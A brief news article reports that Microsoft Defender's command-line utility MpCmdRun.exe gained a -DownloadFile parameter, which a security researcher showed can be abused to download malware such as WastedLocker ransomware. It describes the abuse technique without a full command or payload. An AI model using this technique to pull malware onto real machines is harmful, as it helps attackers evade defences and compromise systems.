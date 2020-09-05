Microsoft Defender, a native antivirus for the Windows operating system, has just gained new functionality that – ironically – can be used improperly to download files infected with viruses. Obviously, downloading malware was not the goal that the Redmond Giant had in mind when designing the feature, but just looking at it with a more evil perspective to see that it can be abused.

What happens is that, starting with compilation 4.18.2007.9, Defender started to have a new parameter in Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe), a kind of command prompt for text controls. The parameter is -DownloadFile, which retrieves files from remote locations, simply inform the source and destination (local) URLs.

Image: Playback / BleepingComputer

Hence the problem: as noted by security researcher Mohammed Askar, this function can be exploited by a malicious agent – with physical access to the computer or by remotely commanding – to download malware. In tests, Askar was able to download the executable for WastedLocker, the famous ransomware that was recently used to attack companies like Garmin.

Fortunately, there is no reason to despair: Microsoft Defender will detect if the file in question is suspicious. Still, we don’t know if it will allow other security solutions to identify the nature of these documents.

Source: BleepingComputer